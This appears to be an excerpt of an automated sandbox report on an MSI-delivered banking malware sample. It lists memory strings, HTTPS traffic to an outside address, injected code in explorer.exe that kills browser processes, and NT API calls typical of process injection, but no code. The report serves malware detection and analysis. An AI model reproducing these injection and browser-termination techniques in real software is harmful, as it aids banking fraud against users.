Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000009.00000000.1922418491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869

Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.4:49894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.4:49904 version: TLS 1.2

E-Banking Fraud

Checks if browser processes are running

Source: C:\Windows\explorer.exe	Code function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, chrome.exe		9_2_0E624948
Source: C:\Windows\explorer.exe	Code function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, iexplore.exe		9_2_0E624948

Source: C:\Windows\System32\rundll32.exe	Code function: 5_3_000001E51CC9D326 NtProtectVirtualMemory,	5_3_000001E51CC9D326
Source: C:\Windows\System32\rundll32.exe	Code function: 5_3_000001E51CC9D2B6 NtAllocateVirtualMemory,	5_3_000001E51CC9D2B6
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E974BE0 NtProtectVirtualMemory,	5_2_000001E51E974BE0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E974FF0 NtQueueApcThread,	5_2_000001E51E974FF0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E974360 NtCreateThreadEx,	5_2_000001E51E974360
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E9417B0 NtClose,NtClose,	5_2_000001E51E9417B0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E941600 NtClose,RtlExitUserThread,	5_2_000001E51E941600
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E958149 NtSetContextThread,	5_2_000001E51E958149
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E9471B0 NtClose,	5_2_000001E51E9471B0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E974740 NtFreeVirtualMemory,	5_2_000001E51E974740
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E973F40 NtAllocateVirtualMemory,	5_2_000001E51E973F40
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E957A50 NtSetContextThread,	5_2_000001E51E957A50
Source: C:\Windows\explorer.exe	Code function: 9_2_0311C704 NtDelayExecution,	9_2_0311C704
Source: C:\Windows\explorer.exe	Code function: 9_2_0311B388 NtAllocateVirtualMemory,	9_2_0311B388
Source: C:\Windows\explorer.exe	Code function: 9_2_031182B4 NtFreeVirtualMemory,	9_2_031182B4
Source: C:\Windows\explorer.exe	Code function: 9_2_03120130 NtAllocateVirtualMemory,	9_2_03120130
Source: C:\Windows\explorer.exe	Code function: 9_2_031181C8 NtWriteFile,	9_2_031181C8
Source: C:\Windows\explorer.exe	Code function: 9_2_03118240 NtClose,	9_2_03118240
Source: C:\Windows\explorer.exe	Code function: 9_2_031180B8 RtlInitUnicodeString,NtCreateFile,	9_2_031180B8
Source: C:\Windows\explorer.exe	Code function: 9_2_0E62241C NtAllocateVirtualMemory,	9_2_0E62241C
Source: C:\Windows\explorer.exe	Code function: 9_2_0E62248C NtFreeVirtualMemory,	9_2_0E62248C

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\45150f.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI15E9.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1658.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1688.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI16A8.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{C0BBEF1E-56B5-4B7D-BEF8-15F4EFC0E044}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI16F7.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI17D3.tmp	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI15E9.tmp

Jump to behavior

Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CB6A50	3_2_00CB6A50
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CEF032	3_2_00CEF032
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CDC2CA	3_2_00CDC2CA
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CE92A9	3_2_00CE92A9
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CDE270	3_2_00CDE270
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CE84BD	3_2_00CE84BD
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CDA587	3_2_00CDA587
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CBC870	3_2_00CBC870
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CDA915	3_2_00CDA915
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CD4920	3_2_00CD4920
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CE0A48	3_2_00CE0A48
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CB9CC0	3_2_00CB9CC0
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CE5D6D	3_2_00CE5D6D
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE1BFB8	5_2_000001E51AE1BFB8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE28BB0	5_2_000001E51AE28BB0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE00038	5_2_000001E51AE00038
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51ADFA030	5_2_000001E51ADFA030
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51ADF8F7C	5_2_000001E51ADF8F7C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE1F134	5_2_000001E51AE1F134
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE0B074	5_2_000001E51AE0B074
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE2C064	5_2_000001E51AE2C064
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE1ED84	5_2_000001E51AE1ED84
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE22F34	5_2_000001E51AE22F34
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51ADFAED4	5_2_000001E51ADFAED4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51ADFDED4	5_2_000001E51ADFDED4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE27E70	5_2_000001E51AE27E70
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51ADEDE7C	5_2_000001E51ADEDE7C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51ADFBE74	5_2_000001E51ADFBE74
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51ADED440	5_2_000001E51ADED440
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE27244	5_2_000001E51AE27244
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE041DC	5_2_000001E51AE041DC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE171E4	5_2_000001E51AE171E4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE0C198	5_2_000001E51AE0C198
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE2214C	5_2_000001E51AE2214C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51ADF8330	5_2_000001E51ADF8330
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE2A294	5_2_000001E51AE2A294
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE0E840	5_2_000001E51AE0E840
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51ADF7808	5_2_000001E51ADF7808
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE0A7F0	5_2_000001E51AE0A7F0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE14780	5_2_000001E51AE14780
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE178D8	5_2_000001E51AE178D8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE218BC	5_2_000001E51AE218BC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51ADFF84C	5_2_000001E51ADFF84C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE17644	5_2_000001E51AE17644
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51ADFA630	5_2_000001E51ADFA630
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE0E5B4	5_2_000001E51AE0E5B4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51ADFD734	5_2_000001E51ADFD734
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE09744	5_2_000001E51AE09744
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51ADEF6C4	5_2_000001E51ADEF6C4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE1B6A0	5_2_000001E51AE1B6A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE26C20	5_2_000001E51AE26C20
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51ADFEB90	5_2_000001E51ADFEB90
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE1FD38	5_2_000001E51AE1FD38
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51ADF6CE0	5_2_000001E51ADF6CE0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE039CC	5_2_000001E51AE039CC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51ADEE9E8	5_2_000001E51ADEE9E8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE1B96C	5_2_000001E51AE1B96C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE2DB3B	5_2_000001E51AE2DB3B
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE2AAF8	5_2_000001E51AE2AAF8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51ADFDB04	5_2_000001E51ADFDB04
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE17AA8	5_2_000001E51AE17AA8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE1FAC4	5_2_000001E51AE1FAC4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E519090024	5_2_000001E519090024
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E5190BDE5C	5_2_000001E5190BDE5C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E5190A9ED8	5_2_000001E5190A9ED8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51909D724	5_2_000001E51909D724
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E5190A6588	5_2_000001E5190A6588
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E5190CF5E0	5_2_000001E5190CF5E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E5190BA098	5_2_000001E5190BA098
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E5190A70B0	5_2_000001E5190A70B0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E5190A98D8	5_2_000001E5190A98D8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E5190BE0E8	5_2_000001E5190BE0E8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E5190CAF48	5_2_000001E5190CAF48
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51909EF6C	5_2_000001E51909EF6C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E5190AD77C	5_2_000001E5190AD77C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E5190A8824	5_2_000001E5190A8824
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51909E290	5_2_000001E51909E290
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E5190D6AEC	5_2_000001E5190D6AEC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E5190D1164	5_2_000001E5190D1164
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E5190C7180	5_2_000001E5190C7180
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E5190DA47E	5_2_000001E5190DA47E
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51909CCE8	5_2_000001E51909CCE8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E5190CF36C	5_2_000001E5190CF36C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E5190A7BD8	5_2_000001E5190A7BD8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E5190AE438	5_2_000001E5190AE438
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E95CBE0	5_2_000001E51E95CBE0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E972812	5_2_000001E51E972812
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E972F60	5_2_000001E51E972F60
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E9613A3	5_2_000001E51E9613A3
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E96FBC0	5_2_000001E51E96FBC0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E962BB0	5_2_000001E51E962BB0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E95B4E0	5_2_000001E51E95B4E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E95A100	5_2_000001E51E95A100
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E949500	5_2_000001E51E949500
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E959120	5_2_000001E51E959120
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E971490	5_2_000001E51E971490
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E96B5E0	5_2_000001E51E96B5E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E9655E0	5_2_000001E51E9655E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E9499D0	5_2_000001E51E9499D0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E967220	5_2_000001E51E967220
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E970210	5_2_000001E51E970210
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E945D60	5_2_000001E51E945D60
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E964550	5_2_000001E51E964550
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E9555C0	5_2_000001E51E9555C0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E954DB0	5_2_000001E51E954DB0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E9666E0	5_2_000001E51E9666E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E95BED0	5_2_000001E51E95BED0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E971F40	5_2_000001E51E971F40
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E94A730	5_2_000001E51E94A730
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E9682A0	5_2_000001E51E9682A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E9516A0	5_2_000001E51E9516A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E9542A0	5_2_000001E51E9542A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51E9466C0	5_2_000001E51E9466C0
Source: C:\Windows\explorer.exe	Code function: 9_2_03112164	9_2_03112164
Source: C:\Windows\explorer.exe	Code function: 9_2_03111A7C	9_2_03111A7C
Source: C:\Windows\explorer.exe	Code function: 9_2_03111A8C	9_2_03111A8C
Source: C:\Windows\explorer.exe	Code function: 9_2_0E624B50	9_2_0E624B50
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6B9708	9_2_0E6B9708
Source: C:\Windows\explorer.exe	Code function: 9_2_0E63FE38	9_2_0E63FE38
Source: C:\Windows\explorer.exe	Code function: 9_2_0E677EE8	9_2_0E677EE8
Source: C:\Windows\explorer.exe	Code function: 9_2_0E681ECC	9_2_0E681ECC
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6B0EC0	9_2_0E6B0EC0
Source: C:\Windows\explorer.exe	Code function: 9_2_0E62BEB8	9_2_0E62BEB8
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6BAE84	9_2_0E6BAE84
Source: C:\Windows\explorer.exe	Code function: 9_2_0E669F68	9_2_0E669F68
Source: C:\Windows\explorer.exe	Code function: 9_2_0E69AF20	9_2_0E69AF20
Source: C:\Windows\explorer.exe	Code function: 9_2_0E627FD0	9_2_0E627FD0
Source: C:\Windows\explorer.exe	Code function: 9_2_0E64FC72	9_2_0E64FC72
Source: C:\Windows\explorer.exe	Code function: 9_2_0E687C14	9_2_0E687C14
Source: C:\Windows\explorer.exe	Code function: 9_2_0E629CBC	9_2_0E629CBC
Source: C:\Windows\explorer.exe	Code function: 9_2_0E695D68	9_2_0E695D68
Source: C:\Windows\explorer.exe	Code function: 9_2_0E650D18	9_2_0E650D18
